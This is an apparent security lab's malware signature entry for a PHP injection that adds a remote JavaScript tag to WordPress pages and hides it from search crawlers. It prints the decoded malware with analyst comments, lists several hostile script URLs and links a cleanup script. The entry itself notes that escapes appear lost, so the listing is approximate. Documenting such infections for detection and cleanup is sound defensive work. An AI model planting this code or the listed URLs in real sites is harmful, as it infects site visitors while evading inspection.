
Malware entry: MW:MROBH:1

Description: Code used to insert malicious JavaScript into many WordPress sites. The injected script is loaded from: http://www.indesignstudioinfo.com/ls.php http://zettapetta.com/js.php http://zettapetta.com/js2.php http://holasionweb.com/oo.php http://www.losotrana.com/js.php It generally infects footer.php (or, in some cases, all PHP files). As the decoded dump shows, the script tag is withheld from requests whose User-Agent contains "googlebot" or "yahoo", so the infection may not be visible when the site is viewed as one of those crawlers. Clean up: Run the following script: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html Malware dump (base64 added to the .php files):
Decoded dump:
// Analyst notes (added for readers of this signature entry):
// This fragment registers an output-buffer callback, mrobh(), via ob_start().
// The callback receives the page's output and returns it with the string
// from gml() inserted, so the script tag never has to exist in the site's
// HTML templates. When cleaning a site, look in PHP files for an ob_start()
// call naming a callback the theme or plugins do not define.
// Each definition is wrapped in function_exists() so the fragment can be
// included from several files without a redeclaration error.
if(!function_exists('mrobh')) {
    if(!function_exists('gml')) {
        // gml(): returns the remote <script> tag, or an empty string when the
        // User-Agent contains "googlebot" or "yahoo" (stristr is
        // case-insensitive). Requests identifying as those crawlers therefore
        // get unmodified output.
        function gml() {
            if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
                return '<script src="http://indesignstudioinfo.com/ls.php"></script>';
            }
            return "";
        }
    }
    // Fallback gzdecode(), defined only when PHP does not already provide one.
    // It follows the gzip member header layout: byte 3 holds the flag bits and
    // the fixed header is 10 bytes long. Every call is prefixed with @, so
    // failures produce no warnings.
    if(!function_exists('gzdecode')) {
        function gzdecode($var1) {
            // $var3 = flag byte, $var2 = offset where the deflate stream starts.
            $var3=@ord(@substr($var1,3,1));
            $var2=10;
            // Flag bit 4: a 2-byte little-endian length at offset 10 followed
            // by that many bytes; skip both.
            if($var3&4) {
                $var4=@unpack('v',substr($var1,10,2));
                $var4=$var4[1];
                $var2+=2+$var4;
            }
            // Flag bits 8 and 16: each marks a NUL-terminated field; advance
            // past the next NUL byte for each one present.
            if($var3&8) {
                $var2=@strpos($var1,chr(0),$var2)+1;
            }
            if($var3&16) {
                $var2=@strpos($var1,chr(0),$var2)+1;
            }
            // Flag bit 2: skip two more bytes.
            if($var3&2) {
                $var2+=2;
            }
            // Inflate the remainder; if that fails, hand back the input
            // unchanged, so output that was never compressed passes through.
            $var5=@gzinflate(@substr($var1,$var2));
            if($var5===FALSE) {
                $var5=$var1;
            }
            return $var5;
        }
    }
    // mrobh($var6): the output-buffer callback. $var6 is the buffered output.
    function mrobh($var6) {
        // Sends "Content-Encoding: none" and then decodes the buffer;
        // presumably so the client does not try to decompress a body that is
        // returned as plain text (confirm against a live sample).
        Header('Content-Encoding: none');
        $var7=gzdecode($var6);
        // NOTE(review): as printed, '/' appears unescaped inside these
        // '/'-delimited patterns and the separator below is the literal "n".
        // Backslash escapes appear to have been lost when this page was
        // rendered, so treat the listing as approximate when writing
        // byte-exact signatures.
        if(preg_match('/</body/si',$var7)) {
            // A closing body tag was found: put the gml() output in front of it.
            return preg_replace('/(</body[^>]*>)/si', gml()."n".'$1', $var7);
        }
        else {
            // No closing body tag: append the gml() output to the end.
            return $var7.gml();
        }
    }
    // Hooks mrobh() into output buffering for the current request.
    ob_start('mrobh');
}
// This final closing brace has no matching opener in the listing as shown.
}

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb